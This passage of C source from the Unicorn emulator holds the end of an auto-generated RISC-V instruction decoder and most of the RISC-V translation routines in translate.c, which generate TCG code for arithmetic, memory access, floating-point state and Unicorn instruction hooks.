&u.f_decode_insn3214)) return true; return false; } return false; case 0x1: /* ........ ........ .001.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:125 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrw(ctx, &u.f_decode_insn329)) return true; return false; case 0x2: /* ........ ........ .010.... 
.1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:126 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrs(ctx, &u.f_decode_insn329)) return true; return false; case 0x3: /* ........ ........ .011.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:127 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrc(ctx, &u.f_decode_insn329)) return true; return false; case 0x5: /* ........ ........ .101.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:128 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrwi(ctx, &u.f_decode_insn329)) return true; return false; case 0x6: /* ........ ........ .110.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:129 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrsi(ctx, &u.f_decode_insn329)) return true; return false; case 0x7: /* ........ ........ .111.... .1110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:130 */ decode_insn32_extract_csr(ctx, &u.f_decode_insn329, insn); if (trans_csrrci(ctx, &u.f_decode_insn329)) return true; return false; } return false; } return false; }
unicorn-2.1.1/qemu/target/riscv/translate.c00006640000000000000000000000733451467524106700207440ustar00rootroot00000000000000
/* * RISC-V emulation for qemu: main translation routines. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/log.h" #include "cpu.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "instmap.h" #include "unicorn/platform.h" #include "uc_priv.h" #include "exec/gen-icount.h" /* * Unicorn: Special disas state for exiting in the middle of tb. 
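* (DISAS_TARGET_6 is repurposed for this below; it lets the translator bail
* out early, e.g. when a hook or uc_emu_stop() asks emulation to stop.)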
*/ #define DISAS_UC_EXIT DISAS_TARGET_6 typedef struct DisasContext { DisasContextBase base; /* pc_succ_insn points to the instruction following base.pc_next */ target_ulong pc_succ_insn; target_ulong priv_ver; bool virt_enabled; uint32_t opcode; uint32_t mstatus_fs; uint32_t misa; uint32_t mem_idx; /* Remember the rounding mode encoded in the previous fp instruction, which we have already installed into env->fp_status. Or -1 for no previous fp instruction. Note that we exit the TB when writing to any system register, which includes CSR_FRM, so we do not have to reset this known value. */ int frm; bool ext_ifencei; // Unicorn struct uc_struct *uc; bool invalid; // invalid instruction, discovered by the translator } DisasContext; #ifdef TARGET_RISCV64 /* convert riscv funct3 to qemu memop for load/store */ static const int tcg_memop_lookup[8] = { // [0 ... 7] = -1, [0] = MO_SB, [1] = MO_TESW, [2] = MO_TESL, [3] = MO_TEQ, [4] = MO_UB, [5] = MO_TEUW, [6] = MO_TEUL, [7] = -1, }; #endif #ifdef TARGET_RISCV64 #define CASE_OP_32_64(X) case X: case glue(X, W) #else #define CASE_OP_32_64(X) case X #endif static inline bool has_ext(DisasContext *ctx, uint32_t ext) { return ctx->misa & ext; } static void generate_exception(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); ctx->base.is_jmp = DISAS_NORETURN; } static void generate_exception_mbadaddr(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); tcg_gen_st_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, offsetof(CPURISCVState, badaddr)); TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, excp); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); ctx->base.is_jmp = DISAS_NORETURN; } static void gen_exception_debug(TCGContext *tcg_ctx) { TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, EXCP_DEBUG); gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); tcg_temp_free_i32(tcg_ctx, helper_tmp); } /* Wrapper around tcg_gen_exit_tb that handles single stepping */ static void exit_tb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled) { gen_exception_debug(tcg_ctx); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } /* Wrapper around tcg_gen_lookup_and_goto_ptr that handles single stepping */ static void lookup_and_goto_ptr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->base.singlestep_enabled) { gen_exception_debug(tcg_ctx); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } } static void gen_exception_illegal(DisasContext *ctx) { generate_exception(ctx, RISCV_EXCP_ILLEGAL_INST); } static void gen_exception_inst_addr_mis(DisasContext *ctx) { generate_exception_mbadaddr(ctx, RISCV_EXCP_INST_ADDR_MIS); } static inline bool use_goto_tb(DisasContext *ctx, target_ulong dest) { if (unlikely(ctx->base.singlestep_enabled)) { return false; } return (ctx->base.tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK); } static void gen_goto_tb(DisasContext *ctx, int n, target_ulong dest) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (use_goto_tb(ctx, dest)) { /* chaining is only allowed when the jump is to the same page */ tcg_gen_goto_tb(tcg_ctx, n); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dest); /* No need to check for single stepping 
here as use_goto_tb() will * return false in case of single stepping. */ tcg_gen_exit_tb(tcg_ctx, ctx->base.tb, n); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, dest); lookup_and_goto_ptr(ctx); } } /* Wrapper for getting reg values - need to check if reg is zero since * cpu_gpr[0] is not actually allocated */ static inline void gen_get_gpr(TCGContext *tcg_ctx, TCGv t, int reg_num) { if (reg_num == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->cpu_gpr[reg_num]); } } /* Wrapper for setting reg values - need to check if reg is zero since * cpu_gpr[0] is not actually allocated. This is more for safety purposes, * since we usually avoid calling the OP_TYPE_gen function if we see a write to * $zero */ static inline void gen_set_gpr(TCGContext *tcg_ctx, int reg_num_dst, TCGv t) { if (reg_num_dst != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg_num_dst], t); } } static void gen_mulhsu(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { TCGv rl = tcg_temp_new(tcg_ctx); TCGv rh = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_tl(tcg_ctx, rl, rh, arg1, arg2); /* fix up for one negative */ tcg_gen_sari_tl(tcg_ctx, rl, arg1, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, rl, rl, arg2); tcg_gen_sub_tl(tcg_ctx, ret, rh, rl); tcg_temp_free(tcg_ctx, rl); tcg_temp_free(tcg_ctx, rh); } static void gen_div(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, cond2, zeroreg, resultopt1; /* * Handle by altering args to tcg_gen_div to produce req'd results: * For overflow: want source1 in source1 and 1 in source2 * For div by zero: want -1 in source1 and 1 in source2 -> -1 result */ cond1 = tcg_temp_new(tcg_ctx); cond2 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)-1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, (target_ulong)(~0L)); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source1, ((target_ulong)1) << (TARGET_LONG_BITS - 1)); tcg_gen_and_tl(tcg_ctx, cond1, cond1, cond2); /* cond1 = overflow */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, 0); /* cond2 = div 0 */ /* if div by zero, set source1 to -1, otherwise don't change */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source1, cond2, zeroreg, source1, resultopt1); /* if overflow or div by zero, set source2 to 1, else don't change */ tcg_gen_or_tl(tcg_ctx, cond1, cond1, cond2); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_div_tl(tcg_ctx, ret, source1, source2); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, cond2); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_divu(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)-1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source1, cond1, zeroreg, source1, resultopt1); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_divu_tl(tcg_ctx, ret, source1, source2); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_rem(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv 
source2) { TCGv cond1, cond2, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); cond2 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, 1L); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond2, source2, (target_ulong)-1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source1, (target_ulong)1 << (TARGET_LONG_BITS - 1)); tcg_gen_and_tl(tcg_ctx, cond2, cond1, cond2); /* cond2 = overflow */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); /* cond1 = div 0 */ /* if overflow or div by zero, set source2 to 1, else don't change */ tcg_gen_or_tl(tcg_ctx, cond2, cond1, cond2); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond2, zeroreg, source2, resultopt1); tcg_gen_rem_tl(tcg_ctx, resultopt1, source1, source2); /* if div by zero, just return the original dividend */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, ret, cond1, zeroreg, resultopt1, source1); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, cond2); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_remu(TCGContext *tcg_ctx, TCGv ret, TCGv source1, TCGv source2) { TCGv cond1, zeroreg, resultopt1; cond1 = tcg_temp_new(tcg_ctx); zeroreg = tcg_const_tl(tcg_ctx, 0); resultopt1 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, resultopt1, (target_ulong)1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, cond1, source2, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, source2, cond1, zeroreg, source2, resultopt1); tcg_gen_remu_tl(tcg_ctx, resultopt1, source1, source2); /* if div by zero, just return the original dividend */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, ret, cond1, zeroreg, resultopt1, source1); tcg_temp_free(tcg_ctx, cond1); tcg_temp_free(tcg_ctx, zeroreg); tcg_temp_free(tcg_ctx, resultopt1); } static void gen_jal(DisasContext *ctx, int rd, target_ulong imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong next_pc; /* check misaligned: */ next_pc = ctx->base.pc_next + imm; if (!has_ext(ctx, RVC)) { if ((next_pc & 0x3) != 0) { gen_exception_inst_addr_mis(ctx); return; } } if (rd != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], ctx->pc_succ_insn); } gen_goto_tb(ctx, 0, ctx->base.pc_next + imm); /* must use this for safety */ ctx->base.is_jmp = DISAS_NORETURN; } #ifdef TARGET_RISCV64 static void gen_load_c(DisasContext *ctx, uint32_t opc, int rd, int rs1, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); int memop = tcg_memop_lookup[(opc >> 12) & 0x7]; if (memop < 0) { gen_exception_illegal(ctx); return; } tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, memop); gen_set_gpr(tcg_ctx, rd, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_store_c(DisasContext *ctx, uint32_t opc, int rs1, int rs2, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); gen_get_gpr(tcg_ctx, dat, rs2); int memop = tcg_memop_lookup[(opc >> 12) & 0x7]; if (memop < 0) { gen_exception_illegal(ctx); return; } tcg_gen_qemu_st_tl(tcg_ctx, dat, t0, ctx->mem_idx, memop); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, dat); } #endif /* The states of mstatus_fs are: * 0 = disabled, 1 = initial, 2 = clean, 3 = dirty * We will have already diagnosed disabled state, * and need to turn initial/clean into dirty. 
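* For example, once an FP instruction retires with FS at initial (1) or
* clean (2), FS must read back as dirty (3); the function below therefore
* ORs MSTATUS_FS | MSTATUS_SD into mstatus (and into mstatus_hs when
* running virtualized), MSTATUS_SD being the summary bit that lets
* context-switch code test for dirty FP state cheaply.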
*/ static void mark_fs_dirty(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tmp; if (ctx->mstatus_fs == MSTATUS_FS) { return; } /* Remember the state change for the rest of the TB. */ ctx->mstatus_fs = MSTATUS_FS; tmp = tcg_temp_new(tcg_ctx); tcg_gen_ld_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus)); tcg_gen_ori_tl(tcg_ctx, tmp, tmp, MSTATUS_FS | MSTATUS_SD); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus)); if (ctx->virt_enabled) { tcg_gen_ld_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus_hs)); tcg_gen_ori_tl(tcg_ctx, tmp, tmp, MSTATUS_FS | MSTATUS_SD); tcg_gen_st_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPURISCVState, mstatus_hs)); } tcg_temp_free(tcg_ctx, tmp); } #if !defined(TARGET_RISCV64) static void gen_fp_load(DisasContext *ctx, uint32_t opc, int rd, int rs1, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (ctx->mstatus_fs == 0) { gen_exception_illegal(ctx); return; } t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); switch (opc) { case OPC_RISC_FLW: if (!has_ext(ctx, RVF)) { goto do_illegal; } tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], t0, ctx->mem_idx, MO_TEUL); /* RISC-V requires NaN-boxing of narrower width floating point values */ tcg_gen_ori_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], tcg_ctx->cpu_fpr[rd], 0xffffffff00000000ULL); break; case OPC_RISC_FLD: if (!has_ext(ctx, RVD)) { goto do_illegal; } tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd], t0, ctx->mem_idx, MO_TEQ); break; do_illegal: default: gen_exception_illegal(ctx); break; } tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); } static void gen_fp_store(DisasContext *ctx, uint32_t opc, int rs1, int rs2, target_long imm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (ctx->mstatus_fs == 0) { gen_exception_illegal(ctx); return; } t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, rs1); tcg_gen_addi_tl(tcg_ctx, t0, t0, imm); switch (opc) { case OPC_RISC_FSW: if (!has_ext(ctx, RVF)) { goto do_illegal; } tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rs2], t0, ctx->mem_idx, MO_TEUL); break; case OPC_RISC_FSD: if (!has_ext(ctx, RVD)) { goto do_illegal; } tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[rs2], t0, ctx->mem_idx, MO_TEQ); break; do_illegal: default: gen_exception_illegal(ctx); break; } tcg_temp_free(tcg_ctx, t0); } #endif static void gen_set_rm(DisasContext *ctx, int rm) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (ctx->frm == rm) { return; } ctx->frm = rm; t0 = tcg_const_i32(tcg_ctx, rm); gen_helper_set_rounding_mode(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } static void decode_RV32_64C0(DisasContext *ctx, uint16_t opcode) { uint8_t funct3 = extract16(opcode, 13, 3); uint8_t rd_rs2 = GET_C_RS2S(opcode); uint8_t rs1s = GET_C_RS1S(opcode); switch (funct3) { case 3: #if defined(TARGET_RISCV64) /* C.LD(RV64/128) -> ld rd', offset[7:3](rs1')*/ gen_load_c(ctx, OPC_RISC_LD, rd_rs2, rs1s, GET_C_LD_IMM(opcode)); #else /* C.FLW (RV32) -> flw rd', offset[6:2](rs1')*/ gen_fp_load(ctx, OPC_RISC_FLW, rd_rs2, rs1s, GET_C_LW_IMM(opcode)); #endif break; case 7: #if defined(TARGET_RISCV64) /* C.SD (RV64/128) -> sd rs2', offset[7:3](rs1')*/ gen_store_c(ctx, OPC_RISC_SD, rs1s, rd_rs2, GET_C_LD_IMM(opcode)); #else /* C.FSW (RV32) -> fsw rs2', offset[6:2](rs1')*/ gen_fp_store(ctx, OPC_RISC_FSW, rs1s, rd_rs2, GET_C_LW_IMM(opcode)); #endif break; } } static void decode_RV32_64C(DisasContext *ctx, uint16_t opcode) { uint8_t op = 
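/* insn[1:0]: RVC quadrant (0-2); 3 would mark a full 32-bit opcode */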
extract16(opcode, 0, 2); switch (op) { case 0: decode_RV32_64C0(ctx, opcode); break; } } #define EX_SH(amount) \ static int ex_shift_##amount(DisasContext *ctx, int imm) \ { \ return imm << amount; \ } EX_SH(1) EX_SH(2) EX_SH(3) EX_SH(4) EX_SH(12) #define REQUIRE_EXT(ctx, ext) do { \ if (!has_ext(ctx, ext)) { \ return false; \ } \ } while (0) static int ex_rvc_register(DisasContext *ctx, int reg) { return 8 + reg; } static int ex_rvc_shifti(DisasContext *ctx, int imm) { /* For RV128 a shamt of 0 means a shift by 64. */ return imm ? imm : 64; } /* Include the auto-generated decoder for 32 bit insn */ #ifdef TARGET_RISCV32 #include "riscv32/decode_insn32.inc.c" #else #include "riscv64/decode_insn32.inc.c" #endif static bool gen_arith_imm_fn(DisasContext *ctx, arg_i *a, void (*func)(TCGContext *, TCGv, TCGv, target_long)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1; source1 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); (*func)(tcg_ctx, source1, source1, a->imm); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); return true; } static bool gen_arith_imm_tl(DisasContext *ctx, arg_i *a, void (*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); tcg_gen_movi_tl(tcg_ctx, source2, a->imm); (*func)(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #ifdef TARGET_RISCV64 static void gen_addw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_add_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static void gen_subw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_sub_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static void gen_mulw(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, TCGv arg2) { tcg_gen_mul_tl(tcg_ctx, ret, arg1, arg2); tcg_gen_ext32s_tl(tcg_ctx, ret, ret); } static bool gen_arith_div_w(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); tcg_gen_ext32s_tl(tcg_ctx, source2, source2); (*func)(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool gen_arith_div_uw(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_ext32u_tl(tcg_ctx, source1, source1); tcg_gen_ext32u_tl(tcg_ctx, source2, source2); (*func)(tcg_ctx, source1, source1, source2); tcg_gen_ext32s_tl(tcg_ctx, source1, source1); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } #endif static bool gen_arith(TCGContext *tcg_ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGv source1, source2; source1 = tcg_temp_new(tcg_ctx); source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); (*func)(tcg_ctx, source1, source1, source2); 
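/* Write-back completes the shared shape of these helpers: read the
 * source GPRs into temporaries, run the TCG emitter supplied by the
 * trans_* caller, then store through gen_set_gpr, which discards
 * writes to x0. */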
gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } static bool gen_shift(DisasContext *ctx, arg_r *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv)) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv source1 = tcg_temp_new(tcg_ctx); TCGv source2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, source1, a->rs1); gen_get_gpr(tcg_ctx, source2, a->rs2); tcg_gen_andi_tl(tcg_ctx, source2, source2, TARGET_LONG_BITS - 1); (*func)(tcg_ctx, source1, source1, source2); gen_set_gpr(tcg_ctx, a->rd, source1); tcg_temp_free(tcg_ctx, source1); tcg_temp_free(tcg_ctx, source2); return true; } /* Include insn module translation function */ #include "insn_trans/trans_rvi.inc.c" #include "insn_trans/trans_rvm.inc.c" #include "insn_trans/trans_rva.inc.c" #include "insn_trans/trans_rvf.inc.c" #include "insn_trans/trans_rvd.inc.c" #include "insn_trans/trans_privileged.inc.c" /* Include the auto-generated decoder for 16 bit insn */ #ifdef TARGET_RISCV32 #include "riscv32/decode_insn16.inc.c" #else #include "riscv64/decode_insn16.inc.c" #endif static void decode_opc(CPURISCVState *env, DisasContext *ctx, uint16_t opcode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* check for compressed insn */ if (extract16(opcode, 0, 2) != 3) { if (!has_ext(ctx, RVC)) { gen_exception_illegal(ctx); } else { ctx->invalid = false; ctx->pc_succ_insn = ctx->base.pc_next + 2; if (!decode_insn16(ctx, opcode)) { /* fall back to old decoder */ decode_RV32_64C(ctx, opcode); } else { // invalid instruction does not advance PC if (ctx->invalid) { ctx->pc_succ_insn -= 2; } } } } else { uint32_t opcode32 = opcode; opcode32 = deposit32(opcode32, 16, 16, translator_lduw(tcg_ctx, env, ctx->base.pc_next + 2)); ctx->pc_succ_insn = ctx->base.pc_next + 4; if (!decode_insn32(ctx, opcode32)) { gen_exception_illegal(ctx); } } } static void riscv_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPURISCVState *env = cs->env_ptr; RISCVCPU *cpu = RISCV_CPU(cs); // unicorn setup ctx->uc = cs->uc; ctx->pc_succ_insn = ctx->base.pc_first; ctx->mem_idx = ctx->base.tb->flags & TB_FLAGS_MMU_MASK; ctx->mstatus_fs = ctx->base.tb->flags & TB_FLAGS_MSTATUS_FS; ctx->priv_ver = env->priv_ver; if (riscv_has_ext(env, RVH)) { ctx->virt_enabled = riscv_cpu_virt_enabled(env); if (env->priv_ver == PRV_M && get_field(env->mstatus, MSTATUS_MPRV) && MSTATUS_MPV_ISSET(env)) { ctx->virt_enabled = true; } else if (env->priv == PRV_S && !riscv_cpu_virt_enabled(env) && get_field(env->hstatus, HSTATUS_SPRV) && get_field(env->hstatus, HSTATUS_SPV)) { ctx->virt_enabled = true; } } else { ctx->virt_enabled = false; } ctx->misa = env->misa; ctx->frm = -1; /* unknown rounding mode */ ctx->ext_ifencei = cpu->cfg.ext_ifencei; } static void riscv_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void riscv_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next); } static bool riscv_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); ctx->base.is_jmp = DISAS_NORETURN; gen_exception_debug(tcg_ctx); /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to 
be properly cleared -- thus we increment the PC here so that the logic setting tb->size below does the right thing. */ ctx->base.pc_next += 4; return true; } static void riscv_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPURISCVState *env = cpu->env_ptr; uint16_t opcode16 = translator_lduw(tcg_ctx, env, ctx->base.pc_next); TCGOp *tcg_op, *prev_op = NULL; bool insn_hook = false; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { // Unicorn: We have to exit current execution here. dcbase->is_jmp = DISAS_UC_EXIT; } else { // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); // save the last operand prev_op = tcg_last_op(tcg_ctx); insn_hook = true; gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } decode_opc(env, ctx, opcode16); if (insn_hook) { // Unicorn: patch the callback to have the proper instruction size. if (prev_op) { // As explained further up in the function where prev_op is // assigned, we move forward in the tail queue, so we're 